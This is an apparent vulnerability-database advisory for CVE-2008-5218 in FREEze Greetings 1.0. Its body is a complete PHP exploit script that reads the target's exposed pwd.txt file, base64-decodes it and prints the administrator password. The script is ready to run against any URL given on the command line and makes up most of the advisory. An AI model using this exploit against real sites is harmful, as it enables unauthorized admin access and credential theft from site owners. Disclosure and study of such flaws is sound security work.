Topic : | FREEze Greetings 1.0 Remote Password Retrieve Exploit
|
SecurityAlert : 4633
CVE : CVE-2008-5218
CWE : CWE-264
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : cOndemned
Published : 26.11.2008
Affected Software : | scriptsez:freeze_greetings:1.0 |
 Advisory Content : <?php
/**
* FREEze Greetings 1.0 Remote Password Retrieve Exploit
* Exploit by cOndemned
*
* Greetz : suN8Hclf, 0in, m4r1usz, str0ke, rtgn, doctor, sid.psycho [...]
* Special thx to ZaBeaTy for developing such a sexy regexp ;) Thx m8
*/
echo <<< Header
[~] FREEze Greetings 1.0 Remote Password Retrieve Exploit
[~] Exploit by cOndemned [ Prints decoded admin password ]
Header;
if($argc != 2) printf("[~] Usage : php %s <target_with_path>\r\n\r\n",
$argv[0]) and exit;
$out = (preg_match('!^([^ ]+)$!sei', file_get_contents($argv[1] .
'/pwd.txt'), $r) && preg_match('!^([^\|\|]+)\|\|!sei',
base64_decode($r[1]), $pass))
? sprintf("Password : %s", base64_decode($pass[1])) : 'Exploitation
failed';
printf("[~] %s \r\n\r\n", $out);
?>
References :
http://www.milw0rm.com/exploits/7140
http://secunia.com/advisories/32744
http://osvdb.org/49883
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|